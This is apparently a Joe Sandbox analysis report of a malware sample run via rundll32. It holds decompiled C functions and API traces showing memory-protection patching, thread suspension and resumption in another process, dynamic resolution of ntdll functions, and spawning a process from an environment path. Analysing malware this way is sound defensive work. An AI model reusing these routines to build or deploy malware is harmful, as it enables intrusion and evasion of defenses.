                                            • Instruction ID: 7d67efb90f01a83c0947babc20af4b7cf1c8236f0cc14bdbd92367ab884af941
                                            • Opcode Fuzzy Hash: 1f88ea66679fb4088665fb9997fc09b5fae3283e15fd55d96017d71bf55a8f43
                                            • Instruction Fuzzy Hash: 83812C71A00205AFDB50DF98D884BEEBBF9FB48750F598139EA15E7240E774E905CB60
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 283 49f6b13-49f6b45 memset CreateWaitableTimerA 284 49f6b4b-49f6ba4 _allmul SetWaitableTimer WaitForMultipleObjects 283->284 285 49f6cc6-49f6ccc GetLastError 283->285 287 49f6c2e-49f6c34 284->287 288 49f6baa-49f6bad 284->288 286 49f6cd0-49f6cda 285->286 289 49f6c35-49f6c39 287->289 290 49f6baf call 49f67e2 288->290 291 49f6bb8 288->291 292 49f6c3b-49f6c43 RtlFreeHeap 289->292 293 49f6c49-49f6c4d 289->293 296 49f6bb4-49f6bb6 290->296 295 49f6bc2 291->295 292->293 293->289 297 49f6c4f-49f6c59 CloseHandle 293->297 298 49f6bc6-49f6bcb 295->298 296->291 296->295 297->286 299 49f6bde-49f6c0b call 49f5803 298->299 300 49f6bcd-49f6bd4 298->300 304 49f6c0d-49f6c18 299->304 305 49f6c5b-49f6c60 299->305 300->299 301 49f6bd6 300->301 301->299 304->298 306 49f6c1a-49f6c25 call 49f29f2 304->306 307 49f6c7f-49f6c87 305->307 308 49f6c62-49f6c68 305->308 313 49f6c2a 306->313 309 49f6c8d-49f6cbb _allmul SetWaitableTimer WaitForMultipleObjects 307->309 308->287 311 49f6c6a-49f6c7d call 49f3f62 308->311 309->298 312 49f6cc1 309->312 311->309 312->287 313->287
                                            C-Code - Quality: 83%
                                            			E049F6B13(void* __edx, intOrPtr _a4, intOrPtr _a8) {
                                            				void _v48;
                                            				long _v52;
                                            				struct %anon52 _v60;
                                            				char _v72;
                                            				long _v76;
                                            				void* _v80;
                                            				union _LARGE_INTEGER _v84;
                                            				struct %anon52 _v92;
                                            				void* _v96;
                                            				void* _v100;
                                            				union _LARGE_INTEGER _v104;
                                            				long _v108;
                                            				struct %anon52 _v124;
                                            				long _v128;
                                            				struct %anon52 _t46;
                                            				void* _t51;
                                            				long _t53;
                                            				void* _t54;
                                            				struct %anon52 _t61;
                                            				long _t65;
                                            				struct %anon52 _t66;
                                            				intOrPtr _t68;
                                            				void* _t69;
                                            				void* _t73;
                                            				signed int _t74;
                                            				void* _t76;
                                            				void* _t78;
                                            				void** _t82;
                                            				signed int _t86;
                                            				void* _t89;
                                            
                                            				_t76 = __edx;
                                            				_v52 = 0;
                                            				memset( &_v48, 0, 0x2c);
                                            				_t89 = (_t86 & 0xfffffff8) - 0x54 + 0xc;
                                            				_t46 = CreateWaitableTimerA(0, 1, 0);
                                            				_v60 = _t46;
                                            				if(_t46 == 0) {
                                            					_v92.HighPart = GetLastError();
                                            				} else {
                                            					_push(0xffffffff);
                                            					_push(0xff676980);
                                            					_push(0);
                                            					_push( *0x49fa2e0);
                                            					_v76 = 0;
                                            					_v80 = 0;
                                            					L049F81CA();
                                            					_v84.LowPart = _t46;
                                            					_v80 = _t76;
                                            					SetWaitableTimer(_v76,  &_v84, 0, 0, 0, 0);
                                            					_t51 =  *0x49fa30c; // 0x2cc
                                            					_v76 = _t51;
                                            					_t53 = WaitForMultipleObjects(2,  &_v80, 0, 0xffffffff);
                                            					_v108 = _t53;
                                            					if(_t53 == 0) {
                                            						if(_a8 != 0) {
                                            							L4:
                                            							 *0x49fa2ec = 5;
                                            						} else {
                                            							_t69 = E049F67E2(_t76); // executed
                                            							if(_t69 != 0) {
                                            								goto L4;
                                            							}
                                            						}
                                            						_v104.LowPart = 0;
                                            						L6:
                                            						L6:
                                            						if(_v104.LowPart == 1 && ( *0x49fa300 & 0x00000001) == 0) {
                                            							_v104.LowPart = 2;
                                            						}
                                            						_t74 = _v104.LowPart;
                                            						_t58 = _t74 << 4;
                                            						_t78 = _t89 + (_t74 << 4) + 0x38;
                                            						_t75 = _t74 + 1;
                                            						_v92.LowPart = _t74 + 1;
                                            						_t61 = E049F5803( &_v96, _t75, _t78, _t75, _t89 + _t58 + 0x38, _t78,  &_v100); // executed
                                            						_v124 = _t61;
                                            						if(_t61 != 0) {
                                            							goto L17;
                                            						}
                                            						_t66 = _v92;
                                            						_v104.LowPart = _t66;
                                            						if(_t66 != 3) {
                                            							goto L6;
                                            						} else {
                                            							_t68 = E049F29F2(_t75,  &_v72, _a4, _a8); // executed
                                            							_v124.HighPart = _t68;
                                            						}
                                            						goto L12;
                                            						L17:
                                            						__eflags = _t61 - 0x10d2;
                                            						if(_t61 != 0x10d2) {
                                            							_push(0xffffffff);
                                            							_push(0xff676980);
                                            							_push(0);
                                            							_push( *0x49fa2e4);
                                            							goto L21;
                                            						} else {
                                            							__eflags =  *0x49fa2e8; // 0x0
                                            							if(__eflags == 0) {
                                            								goto L12;
                                            							} else {
                                            								_t61 = E049F3F62();
                                            								_push(0xffffffff);
                                            								_push(0xdc3cba00);
                                            								_push(0);
                                            								_push( *0x49fa2e8);
                                            								L21:
                                            								L049F81CA();
                                            								_v104.LowPart = _t61;
                                            								_v100 = _t78;
                                            								SetWaitableTimer(_v96,  &_v104, 0, 0, 0, 0); // executed
                                            								_t65 = WaitForMultipleObjects(2,  &_v100, 0, 0xffffffff);
                                            								_v128 = _t65;
                                            								__eflags = _t65;
                                            								if(_t65 == 0) {
                                            									goto L6;
                                            								} else {
                                            									goto L12;
                                            								}
                                            							}
                                            						}
                                            						L25:
                                            					}
                                            					L12:
                                            					_t82 =  &_v72;
                                            					_t73 = 3;
                                            					do {
                                            						_t54 =  *_t82;
                                            						if(_t54 != 0) {
                                            							RtlFreeHeap( *0x49fa2d8, 0, _t54); // executed
                                            						}
                                            						_t82 =  &(_t82[4]);
                                            						_t73 = _t73 - 1;
                                            					} while (_t73 != 0);
                                            					CloseHandle(_v80);
                                            				}
                                            				return _v92.HighPart;
                                            				goto L25;
                                            			}

                                            APIs
                                            • memset.NTDLL ref: 049F6B2D
                                            • CreateWaitableTimerA.KERNEL32(00000000,00000001,00000000), ref: 049F6B39
                                            • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 049F6B61
                                            • SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000), ref: 049F6B81
                                            • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,?,?,?,?,?,?,?,?,?,049F2E0E,?), ref: 049F6B9C
                                            • RtlFreeHeap.NTDLL(00000000,00000000,?,?,?,?,?,?,?,?,?,?,049F2E0E,?,00000000), ref: 049F6C43
                                            • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,049F2E0E,?,00000000,?,?), ref: 049F6C53
                                            • _allmul.NTDLL(00000000,FF676980,000000FF,00000002), ref: 049F6C8D
                                            • SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF,00000002,?,?,?), ref: 049F6CA7
                                            • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 049F6CB3
                                              • Part of subcall function 049F67E2: StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,04F793D8,00000000,?,76CDF710,00000000,76CDF730), ref: 049F6831
                                              • Part of subcall function 049F67E2: HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,04F79410,?,00000000,30314549,00000014,004F0053,04F793CC), ref: 049F68CE
                                              • Part of subcall function 049F67E2: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,049F6BB4), ref: 049F68E0
                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,049F2E0E,?,00000000,?,?), ref: 049F6CC6
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.420608030.00000000049F1000.00000020.10000000.00040000.00000000.sdmp, Offset: 049F0000, based on PE: true
                                            • Associated: 00000002.00000002.420596803.00000000049F0000.00000004.10000000.00040000.00000000.sdmp
                                            • Associated: 00000002.00000002.420674617.00000000049F9000.00000002.10000000.00040000.00000000.sdmp
                                            • Associated: 00000002.00000002.420696991.00000000049FA000.00000004.10000000.00040000.00000000.sdmp
                                            • Associated: 00000002.00000002.420720076.00000000049FC000.00000002.10000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_49f0000_rundll32.jbxd
                                            Similarity
                                            • API ID: FreeHeapTimerWaitable$MultipleObjectsWait_allmul$CloseCreateErrorHandleLastmemset
                                            • String ID:
                                            • API String ID: 3521023985-0
                                            • Opcode ID: f2e8e3a991fdebcc76276dc8d65035eeca02c762c0e5b1987c1ecfcdae28856d
                                            • Instruction ID: cdd2a491b952dfd5d4f56ac1489bd29b6716932ff19e0115692310b822c0297c
                                            • Opcode Fuzzy Hash: f2e8e3a991fdebcc76276dc8d65035eeca02c762c0e5b1987c1ecfcdae28856d
                                            • Instruction Fuzzy Hash: 9351AEB1508320BFD710EF159C84D9BBFECEB85324F004A2AFAA892150D775A945CF92
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • lstrlen.KERNEL32(?,?,?,?,00000000,?,058017D3,?), ref: 0581E3C4
                                            • VirtualProtect.KERNEL32(00000000,00000000,00000040,00000200,?,?,?,00000000,?,058017D3,?), ref: 0581E3D6
                                            • lstrcpy.KERNEL32(00000000,?), ref: 0581E3E5
                                            • VirtualProtect.KERNEL32(00000000,00000000,00000200,00000200,?,?,?,00000000,?,058017D3,?), ref: 0581E3F6
                                            • VirtualProtect.KERNEL32(00000000,00000005,00000040,00000400,05825038,00000018,05812C60,?,?,?,00000000,?,058017D3,?,?), ref: 0581E42D
                                            • VirtualProtect.KERNEL32(?,00000004,?,?,?,?,?,00000000,?,058017D3,?,?,?,00000000,00000000), ref: 0581E448
                                            • VirtualProtect.KERNEL32(?,00000004,00000040,?,05825038,00000018,05812C60,?,?,?,00000000,?,058017D3,?,?,?), ref: 0581E45D
                                            • VirtualProtect.KERNEL32(?,00000004,00000040,?,05825038,00000018,05812C60,?,?,?,00000000,?,058017D3,?,?,?), ref: 0581E48A
                                            • VirtualProtect.KERNEL32(?,00000004,?,?,?,?,?,00000000,?,058017D3,?,?,?,00000000,00000000), ref: 0581E4A4
                                            • GetLastError.KERNEL32(?,?,?,00000000,?,058017D3,?,?,?,00000000,00000000), ref: 0581E4AB
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: ProtectVirtual$ErrorLastlstrcpylstrlen
                                            • String ID:
                                            • API String ID: 3676034644-0
                                            • Opcode ID: e657e7f43a7ed552cbef2af442d050cb90c62aee5920dd0b6bdac10139d2b8bf
                                            • Instruction ID: 39780915308ce85620dfd7564c917e35bdedecf588d82ce2f42cf6c05f65df4d
                                            • Opcode Fuzzy Hash: e657e7f43a7ed552cbef2af442d050cb90c62aee5920dd0b6bdac10139d2b8bf
                                            • Instruction Fuzzy Hash: 86411AB1900B09AFDB21DF65C844EAABFBDFB48350F048525EE56E65A0DB34E8058F64
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • memset.NTDLL ref: 0580F6FB
                                              • Part of subcall function 05804345: GetModuleHandleA.KERNEL32(?,?,69B25F44,69B25F44,?,05815886,00000000,00000000,69B25F44,00000000,?,?,0580335A,?,00000000,?), ref: 05804366
                                              • Part of subcall function 05804345: GetProcAddress.KERNEL32(00000000,?), ref: 0580437F
                                              • Part of subcall function 05804345: OpenProcess.KERNEL32(00000400,00000000,69B25F44,?,69B25F44,69B25F44,?,05815886,00000000,00000000,69B25F44,00000000,?,?,0580335A,?), ref: 0580439C
                                              • Part of subcall function 05804345: IsWow64Process.KERNEL32(?,00000000,?,69B25F44,69B25F44,?,05815886,00000000,00000000,69B25F44,00000000,?,?,0580335A,?,00000000), ref: 058043AD
                                              • Part of subcall function 05804345: FindCloseChangeNotification.KERNEL32(?,?,05815886,00000000,00000000,69B25F44,00000000,?,?,0580335A,?,00000000,?), ref: 058043C0
                                            • ResumeThread.KERNEL32(?,?,00000000,CCCCFEEB,?,00000000,00000000,00000004,?,00000000,00000000,76C84EE0,00000000), ref: 0580F7B5
                                            • WaitForSingleObject.KERNEL32(00000064), ref: 0580F7C3
                                            • SuspendThread.KERNEL32(?), ref: 0580F7D6
                                              • Part of subcall function 0580CF88: memset.NTDLL ref: 0580D252
                                            • ResumeThread.KERNEL32(?), ref: 0580F859
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Thread$ProcessResumememset$AddressChangeCloseFindHandleModuleNotificationObjectOpenProcSingleSuspendWaitWow64
                                            • String ID: v
                                            • API String ID: 2397206891-1801730948
                                            • Opcode ID: 067470f6d957c9b6e5bedd710a299e77dbe64df7077ebb021bea55f18072e82c
                                            • Instruction ID: 68564948aa6e2a145e79c0f031ae424729465a1af9dfe78902f899d52c32e8e9
                                            • Opcode Fuzzy Hash: 067470f6d957c9b6e5bedd710a299e77dbe64df7077ebb021bea55f18072e82c
                                            • Instruction Fuzzy Hash: 6441B172A00248ABDFB1AF54CC89AEE7BBAFF04300F049425FE05D2190D730DE918B62
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 93%
                                            			E049F15B9(intOrPtr* __eax, void* __ebx, void* __ecx, void* __edi) {
                                            				void* _t17;
                                            				void* _t18;
                                            				void* _t19;
                                            				void* _t20;
                                            				void* _t21;
                                            				intOrPtr _t24;
                                            				void* _t37;
                                            				void* _t41;
                                            				intOrPtr* _t45;
                                            
                                            				_t41 = __edi;
                                            				_t37 = __ebx;
                                            				_t45 = __eax;
                                            				_t16 =  *((intOrPtr*)(__eax + 0x20));
                                            				if( *((intOrPtr*)(__eax + 0x20)) != 0) {
                                            					E049F3A6F(_t16, __ecx, 0xea60);
                                            				}
                                            				_t17 =  *(_t45 + 0x18);
                                            				_push(_t37);
                                            				_push(_t41);
                                            				if(_t17 != 0) {
                                            					InternetSetStatusCallback(_t17, 0);
                                            					InternetCloseHandle( *(_t45 + 0x18)); // executed
                                            				}
                                            				_t18 =  *(_t45 + 0x14);
                                            				if(_t18 != 0) {
                                            					InternetSetStatusCallback(_t18, 0);
                                            					InternetCloseHandle( *(_t45 + 0x14));
                                            				}
                                            				_t19 =  *(_t45 + 0x10);
                                            				if(_t19 != 0) {
                                            					InternetSetStatusCallback(_t19, 0);
                                            					InternetCloseHandle( *(_t45 + 0x10));
                                            				}
                                            				_t20 =  *(_t45 + 0x1c);
                                            				if(_t20 != 0) {
                                            					FindCloseChangeNotification(_t20); // executed
                                            				}
                                            				_t21 =  *(_t45 + 0x20);
                                            				if(_t21 != 0) {
                                            					CloseHandle(_t21);
                                            				}
                                            				_t22 =  *((intOrPtr*)(_t45 + 8));
                                            				if( *((intOrPtr*)(_t45 + 8)) != 0) {
                                            					E049F4C73(_t22);
                                            					 *((intOrPtr*)(_t45 + 8)) = 0;
                                            					 *((intOrPtr*)(_t45 + 0x30)) = 0;
                                            				}
                                            				_t23 =  *((intOrPtr*)(_t45 + 0xc));
                                            				if( *((intOrPtr*)(_t45 + 0xc)) != 0) {
                                            					E049F4C73(_t23);
                                            				}
                                            				_t24 =  *_t45;
                                            				if(_t24 != 0) {
                                            					_t24 = E049F4C73(_t24);
                                            				}
                                            				_t46 =  *((intOrPtr*)(_t45 + 4));
                                            				if( *((intOrPtr*)(_t45 + 4)) != 0) {
                                            					return E049F4C73(_t46);
                                            				}
                                            				return _t24;
                                            			}

                                            APIs
                                            • InternetSetStatusCallback.WININET(?,00000000), ref: 049F15E7
                                            • InternetCloseHandle.WININET(?), ref: 049F15EC
                                            • InternetSetStatusCallback.WININET(?,00000000), ref: 049F15F7
                                            • InternetCloseHandle.WININET(?), ref: 049F15FC
                                            • InternetSetStatusCallback.WININET(?,00000000), ref: 049F1607
                                            • InternetCloseHandle.WININET(?), ref: 049F160C
                                            • FindCloseChangeNotification.KERNEL32(?,00000000,00000102,?,?,049F53E9,?,?,00000000,00000000,76CC81D0), ref: 049F161C
                                            • CloseHandle.KERNEL32(?,00000000,00000102,?,?,049F53E9,?,?,00000000,00000000,76CC81D0), ref: 049F1626
                                              • Part of subcall function 049F3A6F: WaitForMultipleObjects.KERNEL32(00000002,049F7B35,00000000,049F7B35,?,?,?,049F7B35,0000EA60), ref: 049F3A8A
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.420608030.00000000049F1000.00000020.10000000.00040000.00000000.sdmp, Offset: 049F0000, based on PE: true
                                            • Associated: 00000002.00000002.420596803.00000000049F0000.00000004.10000000.00040000.00000000.sdmp
                                            • Associated: 00000002.00000002.420674617.00000000049F9000.00000002.10000000.00040000.00000000.sdmp
                                            • Associated: 00000002.00000002.420696991.00000000049FA000.00000004.10000000.00040000.00000000.sdmp
                                            • Associated: 00000002.00000002.420720076.00000000049FC000.00000002.10000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_49f0000_rundll32.jbxd
                                            Similarity
                                            • API ID: Internet$Close$Handle$CallbackStatus$ChangeFindMultipleNotificationObjectsWait
                                            • String ID:
                                            • API String ID: 2172891992-0
                                            • Opcode ID: dcb28826c57bf6c1e84a60a5cd946c52f49d2eff64ab49bb3e1e7331cf3239a5
                                            • Instruction ID: 85a65c2797f40622f3520460cda7424b0ed92d2e17dd5d2cc54079b9551ae1f5
                                            • Opcode Fuzzy Hash: dcb28826c57bf6c1e84a60a5cd946c52f49d2eff64ab49bb3e1e7331cf3239a5
                                            • Instruction Fuzzy Hash: BF112E76600648ABC630AFAAEC85C5BB7EEEF543443590D39F256D3520C734FC448BA8
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                              • Part of subcall function 0580A0F2: VirtualProtect.KERNEL32(00000000,00000000,00000040,05801765,?,?,00000000,?,00000000,?,?,05801765,00000000,00000000), ref: 0580A117
                                              • Part of subcall function 0580A0F2: GetLastError.KERNEL32(?,00000000,?,00000000,?,?,05801765,00000000,00000000), ref: 0580A11F
                                              • Part of subcall function 0580A0F2: VirtualQuery.KERNEL32(00000000,?,0000001C,?,00000000,?,00000000,?,?,05801765,00000000,00000000), ref: 0580A136
                                              • Part of subcall function 0580A0F2: VirtualProtect.KERNEL32(00000000,00000000,-2C9B417C,05801765,?,00000000,?,00000000,?,?,05801765,00000000,00000000), ref: 0580A15B
                                            • GetLastError.KERNEL32(00000000,00000004,?,00000000,?,00000000,?,058250A8,0000001C,0581E844,00000002,00000000,00000001,?,?,?), ref: 05817F4C
                                              • Part of subcall function 058150C5: lstrlen.KERNEL32(?,?,?,?,05801765), ref: 058150FD
                                              • Part of subcall function 058150C5: lstrcpy.KERNEL32(00000000,?), ref: 05815114
                                              • Part of subcall function 058150C5: StrChrA.SHLWAPI(00000000,0000002E,?,?,05801765), ref: 0581511D
                                              • Part of subcall function 058150C5: GetModuleHandleA.KERNEL32(00000000,?,?,05801765), ref: 0581513B
                                            • VirtualProtect.KERNEL32(00000000,00000005,00000040,00000040,00000000,00000005,00000000,00000000,?,00000000,05801765,00000000,00000004,?,00000000,?), ref: 05817EC9
                                            • VirtualProtect.KERNEL32(?,00000004,?,?,00000000,05801765,00000000,00000004,?,00000000,?,00000000,?,058250A8,0000001C,0581E844), ref: 05817EE4
                                            • RtlEnterCriticalSection.NTDLL(05829420), ref: 05817F09
                                            • RtlLeaveCriticalSection.NTDLL(05829420), ref: 05817F27
                                              • Part of subcall function 0580A0F2: SetLastError.KERNEL32(?,?,00000000,?,00000000,?,?,05801765,00000000,00000000), ref: 0580A164
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Virtual$Protect$ErrorLast$CriticalSection$EnterHandleLeaveModuleQuerylstrcpylstrlen
                                            • String ID:
                                            • API String ID: 899430048-3916222277
                                            • Opcode ID: 689d560e28fda40c785d51aba9271c9b556b57789002e5c877eefbcce9a935db
                                            • Instruction ID: b4ed49c224942ad6ef5c156b88d423c3a645f1d47540eecafafc9fa93ed7e7d2
                                            • Opcode Fuzzy Hash: 689d560e28fda40c785d51aba9271c9b556b57789002e5c877eefbcce9a935db
                                            • Instruction Fuzzy Hash: 83413771900619AFDB11DF69C849AAABFB8FF48310F008119ED15EB250D734AE91CFA5
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                              • Part of subcall function 058144A5: GetProcAddress.KERNEL32(?,00000318), ref: 058144CA
                                              • Part of subcall function 058144A5: NtWow64QueryInformationProcess64.NTDLL(00000000,00000000,?,00000030,00000000), ref: 058144E6
                                            • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 05813DC1
                                            • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 05813EAC
                                              • Part of subcall function 058144A5: StrRChrA.SHLWAPI(00000018,00000000,0000005C,00000100,00000200), ref: 05814650
                                            • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,00000000,?,?), ref: 05813DF7
                                            • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 05813E03
                                            • lstrcmpi.KERNEL32(?,00000000), ref: 05813E40
                                            • StrChrA.SHLWAPI(?,0000002E), ref: 05813E49
                                            • lstrcmpi.KERNEL32(?,00000000), ref: 05813E5B
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Virtual$AllocFreelstrcmpi$AddressInformationProcProcess64QueryWow64
                                            • String ID:
                                            • API String ID: 3901270786-0
                                            • Opcode ID: e4d0381faaa3558b871dfff282a9859ec40d8b3fdccf0398e3db1839486aa746
                                            • Instruction ID: ef56bab88b92d7b4be6f264d3d25ba7c93798feea5e47afbdbd7ed5747d3204f
                                            • Opcode Fuzzy Hash: e4d0381faaa3558b871dfff282a9859ec40d8b3fdccf0398e3db1839486aa746
                                            • Instruction Fuzzy Hash: E6315B71608311ABD721CE11D844B2BBBEDFB88B54F110919FC85A6290DB74ED44CBAE
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 73%
                                            			E049F2384(void* __eax, void* __ecx) {
                                            				long _v8;
                                            				char _v12;
                                            				void* _v16;
                                            				void* _v28;
                                            				long _v32;
                                            				void _v104;
                                            				char _v108;
                                            				long _t36;
                                            				intOrPtr _t40;
                                            				intOrPtr _t47;
                                            				intOrPtr _t50;
                                            				void* _t58;
                                            				void* _t68;
                                            				intOrPtr* _t70;
                                            				intOrPtr* _t71;
                                            
                                             				_t1 = __eax + 0x14; // 0x74183966
                                             				_t69 =  *_t1;
                                             				// E049F74E0 resolves five ntdll exports whose names start "ZwCr", "ZwMa", "ZwUn", "RtlN" and "ZwCl"
                                             				// (decoded from the DWORD arguments in the API list below); it returns a callable in _v12 and a
                                             				// pointer table in _v16.
                                             				_t36 = E049F74E0(__ecx,  *((intOrPtr*)( *_t1 + 0xc)),  &_v12,  &_v16); // executed
                                             				_v8 = _t36;
                                             				if(_t36 != 0) {
                                             					L12:
                                             					return _v8;
                                             				}
                                             				// E049F799E gets the pointer at _t69+0xc, the value at _t69+8 and the region _v12; _v12 is then
                                             				// called as a function with its own address as argument.
                                             				E049F799E( *((intOrPtr*)(_t69 + 0xc)),  *((intOrPtr*)(_t69 + 8)), _v12);
                                             				_t40 = _v12(_v12);
                                             				_v8 = _t40;
                                             				// Only if that call returned 0 and bit 0 of the global flag at 0x49fa300 is set: spawn a helper process.
                                             				if(_t40 == 0 && ( *0x49fa300 & 0x00000001) != 0) {
                                             					_v32 = 0;     // PROCESS_INFORMATION (_v32 = hProcess, _v28 = hThread, then the two ids), zeroed by the three stosd
                                             					asm("stosd");
                                             					asm("stosd");
                                             					asm("stosd");
                                             					_v108 = 0;    // STARTUPINFOA, 0x44 bytes starting at _v108
                                             					memset( &_v104, 0, 0x40);
                                             					_t47 =  *0x49fa348; // 0x57d5a8 (base of the string table)
                                             					_t18 = _t47 + 0x49fb3e6; // 0x73797325 = "%sys": an environment-variable path template
                                             					_t68 = E049F50E8(_t18); // ExpandEnvironmentStringsA into a heap buffer (see API list)
                                             					if(_t68 == 0) {
                                             						_v8 = 8; // ERROR_NOT_ENOUGH_MEMORY
                                             					} else {
                                             						_t50 =  *0x49fa348; // 0x57d5a8
                                             						_t19 = _t50 + 0x49fb747; // 0x4f78cef (export name; these bytes are not printable, so the name is not visible here)
                                             						_t20 = _t50 + 0x49fb0af; // 0x4e52454b = "KERN" (KERNEL32)
                                             						_t71 = GetProcAddress(GetModuleHandleA(_t20), _t19);
                                             						if(_t71 == 0) {
                                             							_v8 = 0x7f; // ERROR_PROC_NOT_FOUND
                                             						} else {
                                             							_v108 = 0x44; // STARTUPINFOA.cb = sizeof(STARTUPINFOA)
                                             							E049F37E9(); // resolves a kernel32 export whose name starts "Wow6" (see API list); called with 0 before and 1 after the spawn
                                             							// Ten arguments, STARTUPINFO in, PROCESS_INFORMATION out, flags 0x04000000 (CREATE_DEFAULT_ERROR_MODE):
                                             							// the CreateProcessA argument layout, with the expanded path in _t68 as command line.
                                             							_t58 =  *_t71(0, _t68, 0, 0, 0, 0x4000000, 0, 0,  &_v108,  &_v32, 0); // executed
                                             							_push(1);
                                             							E049F37E9();
                                             							if(_t58 == 0) {
                                             								_v8 = GetLastError();
                                             							} else {
                                             								// Closes PROCESS_INFORMATION.hThread; kernel32 resolves FindCloseChangeNotification and CloseHandle to the
                                             								// same code, which is why the sandbox attached this name to the call site.
                                             								FindCloseChangeNotification(_v28); // executed
                                             								CloseHandle(_v32); // PROCESS_INFORMATION.hProcess
                                             							}
                                             						}
                                             						HeapFree( *0x49fa2d8, 0, _t68);
                                             					}
                                             				}
                                             				_t70 = _v16;
                                             				 *((intOrPtr*)(_t70 + 0x18))( *((intOrPtr*)(_t70 + 0x1c))( *_t70)); // tear-down through the resolved ntdll pointer table
                                             				E049F4C73(_t70); // RtlFreeHeap
                                             				goto L12;
                                            			}

                                            APIs
                                              • Part of subcall function 049F74E0: GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,049F23A0,?,?,?,?,00000000,00000000), ref: 049F7505
                                              • Part of subcall function 049F74E0: GetProcAddress.KERNEL32(00000000,7243775A), ref: 049F7527
                                              • Part of subcall function 049F74E0: GetProcAddress.KERNEL32(00000000,614D775A), ref: 049F753D
                                              • Part of subcall function 049F74E0: GetProcAddress.KERNEL32(00000000,6E55775A), ref: 049F7553
                                              • Part of subcall function 049F74E0: GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 049F7569
                                              • Part of subcall function 049F74E0: GetProcAddress.KERNEL32(00000000,6C43775A), ref: 049F757F
                                            • memset.NTDLL ref: 049F23EE
                                              • Part of subcall function 049F50E8: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,74183966,00000000,049F2407,73797325), ref: 049F50F9
                                              • Part of subcall function 049F50E8: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 049F5113
                                            • GetModuleHandleA.KERNEL32(4E52454B,04F78CEF,73797325), ref: 049F2424
                                            • GetProcAddress.KERNEL32(00000000), ref: 049F242B
                                            • HeapFree.KERNEL32(00000000,00000000), ref: 049F2493
                                              • Part of subcall function 049F37E9: GetProcAddress.KERNEL32(36776F57,049F3ECD), ref: 049F3804
                                            • FindCloseChangeNotification.KERNEL32(00000000,00000001), ref: 049F2470
                                            • CloseHandle.KERNEL32(?), ref: 049F2475
                                            • GetLastError.KERNEL32(00000001), ref: 049F2479
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.420608030.00000000049F1000.00000020.10000000.00040000.00000000.sdmp, Offset: 049F0000, based on PE: true
                                             • Associated: 00000002.00000002.420596803.00000000049F0000.00000004.10000000.00040000.00000000.sdmp
                                             • Associated: 00000002.00000002.420674617.00000000049F9000.00000002.10000000.00040000.00000000.sdmp
                                             • Associated: 00000002.00000002.420696991.00000000049FA000.00000004.10000000.00040000.00000000.sdmp
                                             • Associated: 00000002.00000002.420720076.00000000049FC000.00000002.10000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_49f0000_rundll32.jbxd
                                            Similarity
                                            • API ID: AddressProc$Handle$CloseEnvironmentExpandModuleStrings$ChangeErrorFindFreeHeapLastNotificationmemset
                                            • String ID:
                                            • API String ID: 186216982-0
                                            • Opcode ID: 9ec32cdd7f2ae9b01a0273a69cd8a06fe066970650fae7784c474d6b50e3c209
                                            • Instruction ID: 0432185152e67e0fea9db8571276c27e49fc40777087f7e8c9e305f33b59b22f
                                            • Opcode Fuzzy Hash: 9ec32cdd7f2ae9b01a0273a69cd8a06fe066970650fae7784c474d6b50e3c209
